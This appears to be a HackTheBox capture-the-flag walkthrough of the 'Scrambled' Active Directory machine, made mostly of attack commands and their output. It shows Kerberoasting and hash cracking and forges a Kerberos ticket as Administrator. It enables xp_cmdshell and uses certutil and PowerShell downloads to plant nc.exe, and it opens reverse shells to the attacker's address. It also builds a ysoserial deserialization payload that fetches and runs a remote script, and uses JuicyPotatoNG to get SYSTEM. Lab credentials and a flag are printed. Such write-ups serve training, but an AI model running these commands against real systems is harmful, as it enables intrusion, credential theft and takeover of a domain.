htb-scrambled-nl

Scrambled

Scanning

> TARGET=10.10.11.168 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Scramble Corp Intranet
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-06-15 23:15:44Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
4411/tcp  open  found?        syn-ack ttl 127
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|   FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|_    ERROR_UNKNOWN_COMMAND;
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49552/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49692/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49696/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

There are many open ports, this is seemingly a target on AD, with ldap and kerberos enabled. We need to do enum at several interesting places.

Found several domain names that might be useful later.

scrm.local
DC1.scrm.local
scramblecorp.com

Web Enum

Web enum found something interesting: http://scrm.local/support.html

04/09/2021: Due to the security breach last month we have now disabled all NTLM authentication on our network. This may cause problems for some of the programs you use so please be patient while we work to resolve any issues 

http://scrm.local/supportrequest.html, there is also a username found in the screenshot, ksimpson.

http://scrm.local/salesorders.html, this page shows a client application used for this organisation. Later, we will find there is a server running on port 4411.

If you are experiencing a problem with the sales orders app, please enable debug logging and reproduce the problem. You can enable debug logging by doing the following: 

A log file named ScrambleDebugLog will have been created in the same folder you launched the sales app from. Send this file to us via email along with a description of the problem 

Directory enum didn’t find anything useful

> dirsearch -u http://scrm.local/ -x 403,401,500,400 -f
[19:48:54] Starting:
[19:50:00] 301 -  148B  - /assets  ->  http://scrm.local/assets/
[19:50:40] 301 -  148B  - /images  ->  http://scrm.local/images/
[19:50:41] 200 -    2KB - /index.html
[19:51:07] 200 -    2KB - /passwords.html
[19:51:41] 200 -    2KB - /support.html

Further page enum didn’t find anything intersting

> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scrm.local/FUZZ.html"

Subdomain enum didn’t find anything useful

> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scrm.local/" -H "Host: FUZZ.scrm.local"
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scramblecorp.com/" -H "Host: FUZZ.scramblecorp.com"

So, this target may not have much to do with web vectors.

Host Enum

Perform host enum, didn’t find anything useful

> enum4linux 10.10.11.168

Port 4411 Enum

Use nc to connect to the non-conventional port 4411, there seems to be a server application running here. But we cannot confirm what application it is.

> nc -vn 10.10.11.168 4411

LDAP Enum

Perform ldap enum using a simple python module

Python 3.10.4 (main, Mar 24 2022, 13:07:27) [GCC 11.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import ldap3
>>> server = ldap3.Server('10.10.11.168', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
>>> server.info

DSA info (from DSE):
  Supported LDAP versions: 3, 2
  Naming contexts: 
    DC=scrm,DC=local
    CN=Configuration,DC=scrm,DC=local
    CN=Schema,CN=Configuration,DC=scrm,DC=local
    DC=DomainDnsZones,DC=scrm,DC=local
    DC=ForestDnsZones,DC=scrm,DC=local

nmap scan using ldap scripts confirms the above results

> nmap -n -sV --script "ldap* and not brute" 10.10.11.168

Overall, nothing useful at this stage

Kerberos Enum

Perform username enum

> kerbrute userenum -d scrm.local --dc 10.10.11.168 /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt

2022/06/15 20:03:16 >  [+] VALID USERNAME:       administrator@scrm.local
2022/06/15 20:04:30 >  [+] VALID USERNAME:       asmith@scrm.local
2022/06/15 20:06:16 >  [+] VALID USERNAME:       Administrator@scrm.local
2022/06/15 20:07:39 >  [+] VALID USERNAME:       jhall@scrm.local
2022/06/15 20:16:59 >  [+] VALID USERNAME:       sjenkins@scrm.local
2022/06/15 20:18:19 >  [+] VALID USERNAME:       khicks@scrm.local
2022/06/15 20:30:25 >  [+] VALID USERNAME:       Asmith@scrm.local
2022/06/15 20:48:39 >  [+] VALID USERNAME:       ASMITH@scrm.local

And, we know there might be a user called ksimpson from the previous screenshot. We can confirm this. This user also happens to use a password that is same as the username.

> kerbrute bruteuser -d scrm.local --dc 10.10.11.168 pass.txt ksimpson

This user can be used to obtain a TGT, to do so, use getTGT.py. Note: you may encounter an error when running the getTGT.py script, fix the script according to https://github.com/SecureAuthCorp/impacket/issues/1206

> getTGT.py scrm.local/ksimpson:ksimpson -dc-ip 10.10.11.168
> export KRB5CCNAME=ksimpson.ccache
> impacket-GetUserSPNs scrm.local/ksimpson -k -dc-ip dc1.scrm.local -no-pass -request
Some Googling shows that the author of this box has raised an issue on the Impacket GitHub for this very error with the title “GetUserSpns.py fails when using -k option and NTLM auth is disabled”. The suggested fix in that issue is to edit one line, which I’ll do on line 260:

        if self.__doKerberos:
            #target = self.getMachineName()
            target = self.__kdcHost

After making that change, it dumps a challenge/response (or “hash”, but not really a hash) for the MSSQLSvc user:

 

.

┌──(puck㉿kali)-[~/htb/scrambled]
└─$ python3 GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-ip dc1.scrm.local -request -k
Impacket v0.11.0 - Copyright 2023 Fortra

ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 17:32:02.351452 2023-10-13 15:08:55.430424
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 17:32:02.351452 2023-10-13 15:08:55.430424




$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$09051c16c6b00ac737cc62f4fa5dec17$62e8f9961f859c011f2ac89523144de7ffafe7aacdc92bb3cd9edd3e08636753ee4b12022abc683f0fb82a53e08b2b5c09cf7704c12d16a4ded4ab34d864a52211afcf51e20a1412832a802d363dab28cb49b116bfb36d5d3de805d40e0c3915931e2127874319274e7c06dd1d1a8281304cb22d535b065537706a79729055ae3c17691c7530ea5eb76a5a78e9bb787c194d3a220c3b9fd60f59fe2c4dbc96886c3983e3c5976048b549026b70a0e42626e29dcb74a2d87d4cfa5cd225ee1c8a081faae651685194d0e2710a2637ddf58cf127e42d296c71cea104d711d43c56233879fe48c0cbb3ff6ad26e9202f9a9e69031df85f1eeaf94e6ece90e2cdd832e17c4758d93af0c83871b8dfa46a241c72e8fb192d4512e0d34774ae59b8ec18eb8886e73927caeeeec01946a03439fd63c664946106ae60cb69c6fea7d2bc373e72abf4127be697cb249ff9d4121c0650d8a213bc7a32f436619906bd69d3906c52e8e1099612d3df5026ef4fc317beb1a775e39ade9d46702ab3a597224c2fead04989b86254bcc0e69d17e688ef167b87ee3c1b09d6ea573e68fa165652051fa7d4408fda21d68230226057a593af2df26fb378896cdccf227791f5794739da0bb450e0ff8a66e2beca63250ce63492d0d191e873a9e2b4ce4186a4462b587509c815f79939824c2a21dbe4f2eb28537b92f14d11fb6ed37d028ec5eacd813af4e7db7b97af228635731279be37dcae7e604300657700506bada5b843adc67ac3242afb384865d95ba6d801057d2dfdd14bea1ae71bbe69784287c7edeb5b746451b8c24c6e8594210b2e346fec69eb56c03c00a8d4b44c1ac7d17dca267eaf72b8467f01b7ff5643772ccf74b4e64d9b4f70f3130fd12848c893733ef4aff760668ae14ffbb26ddc19603ae34c5ebb151b78826d09d882761c037e12d552ec90d28c5e7b361e179443bca4f111dc399cc53d72a87474467385e7aec504ece93157372bbc43fd54e2367c7056906f0540ea6b5680c7bbee53888e9b089cca2ee45b20f90b831a22fd0565153b0ef56e691d3c67b16ac64f5fb9a0ee0f96a0dbad8b5f57878fcf20bce7f87fb5829138d75db659c49617aad29f8ff17ee40dcd2f54635b353600b2af05f7be5629fd5109e60db01d4d86b622fb3ab2d4578eba30943b3cf388624a0be7e3dca6f3db66da2c902df2ae1c8a546a3bfbf644cc1218f2277a4114765a95658ae0e993de375aa87a88fa70c6c102561cf79c4f44d2f10f7e171a0cc91dcf8b58c97a739c32fcc82d8d15211b2e6c5efedd1be0e6a74bdd665bb5597dab63d559b1f7dccc45a50776824b477b27249a24bc7a7f59e18b9062fd316b99504c9694d284c86d1e7e580f52eef3924d2aab030e239e8386c1d3e48560c70a5415e11755dad320d099de3296e04baa65c6c

┌──(puck㉿kali)-[~/htb/scrambled]

Save the ticket to a file mssqlsvc-hash and crack using john

┌──(puck㉿kali)-[~/htb/scrambled]
└─$ john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt mssqlsvc-hash 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Pegasus60 (?) 
1g 0:00:00:03 DONE (2023-10-13 16:12) 0.2652g/s 2846Kp/s 2846Kc/s 2846KC/s Petergrant..Pearce
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

┌──(puck㉿kali)-[~/htb/scrambled]

We now have a service principal credential, sqlsvc:Pegasus60

Foothold

Via golden ticket impersonation, we can gain foothold as the service principal, for background refer to: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket

To do so, we need the ntlm hash of a valid account password and the domain SID

Get Domain SID using

┌──(puck㉿kali)-[~/htb/scrambled]
└─$ impacket-getPac -targetUser sqlsvc scrm.local/sqlsvc:Pegasus60 | grep "Domain SID" 
Domain SID: S-1-5-21-2743207045-1827831105-2542523200

.

Generate the ntlm hash for the password `Pegasus60` using https://codebeautify.org/ntlm-hash-generator, this gives b999a16500b87d17ec7f2e2a68778f05

Impersonate as Administrator, the uid is 500 by convention, read about how MS manage uid for more background.

┌──(puck㉿kali)-[~/htb/scrambled]
└─$ impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSVC/dc1.scrm.local Administrator 
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache

┌──(puck㉿kali)-[~/htb/scrambled]

Connect to mssql via the impersonated ticket

──(puck㉿kali)-[~/htb/scrambled]
└─$ export KRB5CCNAME=Administrator.ccache


┌──(puck㉿kali)-[~/htb/scrambled]
└─$ klist 
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@SCRM.LOCAL

Valid starting Expires Service principal
10/13/2023 16:28:55 10/10/2033 16:28:55 MSSQLSVC/dc1.scrm.local@SCRM.LOCAL
renew until 10/10/2033 16:28:55

┌──(puck㉿kali)-[~/htb/scrambled]
┌──(puck㉿kali)-[~/htb/scrambled]
└─$ impacket-mssqlclient dc1.scrm.local -k
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (SCRM\administrator dbo@master)> select name, database_id from sys.databases;
name database_id 
---------- ----------- 
master 1

tempdb 2

model 3

msdb 4

ScrambleHR 5

SQL (SCRM\administrator dbo@master)> SELECT TABLE_NAME FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;
TABLE_NAME 
---------- 
Employees

UserImport

Timesheets

SQL (SCRM\administrator dbo@master)> SELECT * from ScrambleHR.dbo.UserImport;
LdapUser LdapPwd LdapDomain RefreshInterval IncludeGroups 
-------- ----------------- ---------- --------------- ------------- 
MiscSvc ScrambledEggs9900 scrm.local 90 0

SQL (SCRM\administrator dbo@master)>

Enable cmdshell

> enable_xp_cmdshell
> xp_cmdshell("whoami")

Upload nc.exe and create a reverse shell, need to locate a folder where the current account can write to

> xp_cmdshell certutil.exe -urlcache -f http://10.10.16.3/nc.exe ..\..\Temp\nc.exe
> xp_cmdshell ..\..\Temp\nc.exe 10.10.16.3 4444 -e cmd.exe

Upload SharpHound.exe, I used this version: /usr/lib/bloodhound/resources/app/Collectors/DebugBuilds/SharpHound.exe, and run SharpHound and transfer back to kali for analysis

> certutil.exe -urlcache -f http://10.10.16.3/sh.exe sh.exe

From BloodHound analysis, we can find there is a tstar user from IT group, which has CanPSRemote right. However, this has proven to be useless after some trial and error.

PE

Upload winpeas

> certutil.exe -urlcache -f http://10.10.16.3/p.exe p.exe

# found something intersting from WinPeas
ScrmOrders(Scramble Sales Orders Server)[C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe 4411] - Auto - Running - No quotes and Space detected

[+] Network Shares
ADMIN$ (Path: C:\Windows)
C$ (Path: C:\)
HR (Path: C:\Shares\HR) -- Permissions: AllAccess
IPC$ (Path: )
IT (Path: C:\Shares\IT) -- Permissions: AllAccess
NETLOGON (Path: C:\Windows\SYSVOL\sysvol\scrm.local\SCRIPTS)
Public (Path: C:\Shares\Public) -- Permissions: AllAccess
Sales (Path: C:\Shares\Sales) -- Permissions: AllAccess
SYSVOL (Path: C:\Windows\SYSVOL\sysvol)

There is a pdf document in C:\Shares\Public, it says HR has a database, which may contain user passwords

Check db for user passwords

> sqlcmd -q "select name from sys.databases"

Check tables in ScrambleHR

> sqlcmd -q "use ScrambleHR;select table_name from information_schema.tables"

# found
Employees
UserImport
Timesheets

Check table content of UserImport, found user MiscSvc with ldap credential

> sqlcmd -q "use ScrambleHR;select db_name();select * from UserImport;"

MiscSvc is an IT User, which mean, it has CanPSRemote permission, but evil-winrm doesn’t work.

in order to get a reverse shell, you can use the “PowerShell #3 (Base64)” from revshells.com.

SQL> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAG[...]


kali@kali:~/Documents/HTB/Scrambled$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.64] from (UNKNOWN) [10.10.11.168] 57867
whoami
scrm\sqlsvc
PS C:\Windows\system32>

Now, we need to create another reverse shell in order to become MiscSvc, obtaining the user flag.

For doing so, execute the following commands:

$SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Scrm\MiscSvc', $SecPassword)
Invoke-Command -Computer dc1 -Credential $Cred -ScriptBlock {<SAME PAYLOAD AS BEFORE>}

Privilege Escalation

From previous enum, there is a server app running at C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe

Check the user that’s running the process received NA, the process might be run by an account with a higher privilege.

> tasklist /v

However we can access c:\shares\it, there is a copy of the Sale Order Client application and a dll file.

* Copy these two files to c:\temp
> nc.exe 10.10.16.3 7777 < ScrambleLib.dll
> nc.exe 10.10.16.3 7777 < ScrambleClient.exe
* On kali
> nc -vnlp 7777 > ScrambleLib.dll
> nc -vnlp 7777 > ScrambleClient.exe

Reverse Eng

We can find some seemingly operation codes from strings

> strings ScrambleLib.dll

Setup ilspy and reverse the dll, https://github.com/icsharpcode/ILSpy

> /root/.dotnet/tools/ilspycmd -p -o decompile ScrambleLib.dll

Read the decompiled code and understand how the commands work. The payloads are .net serialised.

Use ysoserial to exploit .net deserilisation vulnerabilities, this needs to run on windows, https://github.com/pwntester/ysoserial.net

> ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "powershell.exe Invoke-Command -Computer dc1 -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.10.16.3/shell.ps1') }"

Run a nc listener and upload the payload

> nc 10.10.16.3 4411
> UPLOAD_ORDER;AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAA8ApBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBdGdZOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0T0NJL1BnMEtQRTlpYW1WamRFUmhkR0ZRY205MmFXUmxjaUJOWlhSb2IyUk9ZVzFsUFNKVGRHRnlkQ0lnU1hOSmJtbDBhV0ZzVEc5aFpFVnVZV0pzWldROUlrWmhiSE5sSWlCNGJXeHVjejBpYUhSMGNEb3ZMM05qYUdWdFlYTXViV2xqY205emIyWjBMbU52YlM5M2FXNW1lQzh5TURBMkwzaGhiV3d2Y0hKbGMyVnVkR0YwYVc5dUlpQjRiV3h1Y3pwelpEMGlZMnh5TFc1aGJXVnpjR0ZqWlRwVGVYTjBaVzB1UkdsaFoyNXZjM1JwWTNNN1lYTnpaVzFpYkhrOVUzbHpkR1Z0SWlCNGJXeHVjenA0UFNKb2RIUndPaTh2YzJOb1pXMWhjeTV0YVdOeWIzTnZablF1WTI5dEwzZHBibVo0THpJd01EWXZlR0Z0YkNJK0RRb2dJRHhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWEl1VDJKcVpXTjBTVzV6ZEdGdVkyVStEUW9nSUNBZ1BITmtPbEJ5YjJObGMzTStEUW9nSUNBZ0lDQThjMlE2VUhKdlkyVnpjeTVUZEdGeWRFbHVabTgrRFFvZ0lDQWdJQ0FnSUR4elpEcFFjbTlqWlhOelUzUmhjblJKYm1adklFRnlaM1Z0Wlc1MGN6MGlMMk1nY0c5M1pYSnphR1ZzYkM1bGVHVWdTVzUyYjJ0bExVTnZiVzFoYm1RZ0xVTnZiWEIxZEdWeUlHUmpNU0F0VTJOeWFYQjBRbXh2WTJzZ2V5QkpSVmdvVG1WM0xVOWlhbVZqZENCT1pYUXVWMlZpUTJ4cFpXNTBLUzVrYjNkdWJHOWhaRk4wY21sdVp5Z25hSFIwY0Rvdkx6RXdMakV3TGpFMkxqTXZjMmhsYkd3dWNITXhKeWtnZlNJZ1UzUmhibVJoY21SRmNuSnZja1Z1WTI5a2FXNW5QU0o3ZURwT2RXeHNmU0lnVTNSaGJtUmhjbVJQZFhSd2RYUkZibU52WkdsdVp6MGllM2c2VG5Wc2JIMGlJRlZ6WlhKT1lXMWxQU0lpSUZCaGMzTjNiM0prUFNKN2VEcE9kV3hzZlNJZ1JHOXRZV2x1UFNJaUlFeHZZV1JWYzJWeVVISnZabWxzWlQwaVJtRnNjMlVpSUVacGJHVk9ZVzFsUFNKamJXUWlJQzgrRFFvZ0lDQWdJQ0E4TDNOa09sQnliMk5sYzNNdVUzUmhjblJKYm1adlBnMEtJQ0FnSUR3dmMyUTZVSEp2WTJWemN6NE5DaUFnUEM5UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJdVQySnFaV04wU1c1emRHRnVZMlUrRFFvOEwwOWlhbVZqZEVSaGRHRlFjbTkyYVdSbGNqNEwL

Get the reverse shell and catch the root flag

rooted

Alternative Roots

Unintended File Read Via MSSQL

Wh04m1 got root blood on Scrambled using this technique. This post on MSSQL Tips talks about how to read a file using MSSQL using the BULK option, which was added to SQL Server 2005. Their example query is:

SELECT BulkColumn 
FROM OPENROWSET (BULK 'c:\temp\mytxtfile.txt', SINGLE_CLOB) MyFile 

OPENROWSET returns a single column named BulkColumn. MyFile is a correlation name, which isn’t really important here other than it must exist, and it doesn’t really matter what I put there.

OPENROWSET, when used with the BULK provider takes a file path and one of three keywords:

  • SINGLE_BLOB returns as a varbinary
  • SINGLE_CLOB returns as a varchar
  • SINGLE_NCLOB returns as a nvarchar

So to read root.txt, I’ll run:

SQL> SELECT BulkColumn FROM OPENROWSET(BULK 'C:\users\administrator\desktop\root.txt', SINGLE_CLOB) MyFile
BulkColumn

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   

b'a01b823bd0d7c97c98646d36d1d03c02\r\n' 

RoguePotato

Get Execution Via MSSQL

To get to a place where I could run RoguePotato, I’ll need to be executing with the SeImpersonatePrivilege. I’m most likely to find this through the MSSQL service.

To run commands via MSSQL, I’ll use the xp_cmdshell stored procedure. If I try to run this initially, it will fail:

SQL> xp_cmdshell whoami
[-] ERROR(DC1): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

I can reconfigure that with the following four lines:

SQL> EXECUTE sp_configure 'show advanced options', 1
[*] INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE
SQL> EXECUTE sp_configure 'xp_cmdshell', 1
[*] INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE

Now it works:

SQL> xp_cmdshell whoami
output

--------------------------------------------------------------------------------

scrm\sqlsvc

NULL   

Privilege Check

The service is running as scrm\sqlsvc, which does have SeImpersonate:

SQL> xp_cmdshell whoami /priv
output
--------------------------------------------------------------------------------
NULL
PRIVILEGES INFORMATION
----------------------
NULL
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
NULL

JuicyPotatoNG

RoguePotato will work on Scrambled, but I’ll use this opportunity to show off JuicyPotatoNG, the latest Potato which was released just over a week before Scrambled retired.

The details of the exploit can be found here, and involve a significant understanding of Windows internals details.

Practically speaking, I can download the compiled exe from the release page, and serve it from my webserver along with two other files:

  • nc64.exe, which I’ll use to get a reverse shell
  • rev.bat, which simply invokes nc64.exe to return a reverse shell to my VM:
    C:\\programdata\\nc64.exe -e cmd 10.10.14.6 443
    

Staging out of C:\ProgramData\, I’ll upload all three to Scrambled from MSSQL:

SQL> xp_cmdshell powershell curl 10.10.14.6/nc64.exe -outfile C:\\programdata\\nc64.exe
output
--------------------------------------------------------------------------------
NULL
SQL> xp_cmdshell powershell curl 10.10.14.6/rev.bat -outfile C:\\programdata\\rev.bat
output
--------------------------------------------------------------------------------
NULL
SQL> xp_cmdshell powershell curl 10.10.14.6/JuicyPotatoNG.exe -outfile C:\\programdata\\jp.exe
output
--------------------------------------------------------------------------------
NULL

Now with nc listening on my host, I’ll invoke JuicyPotatoNG:

SQL> xp_cmdshell C:\\programdata\\jp.exe -t * -p C:\\programdata\\rev.bat
output
--------------------------------------------------------------------------------
NULL
NULL
         JuicyPotatoNG
         by decoder_it & splinter_code
NULL
[*] Testing CLSID {854A20FB-2D44-457D-992F-EF13785D2B51} - COM server port 10247
[+] authresult success {854A20FB-2D44-457D-992F-EF13785D2B51};NT AUTHORITY\SYSTEM;Impersonation
[+] CreateProcessWithTokenW OK
[+] Exploit successful!
NULL 

It reports success, and there is a shell running as SYSTEM at nc:

puck@kali$ rlwrap -nlvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.168 63184
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

.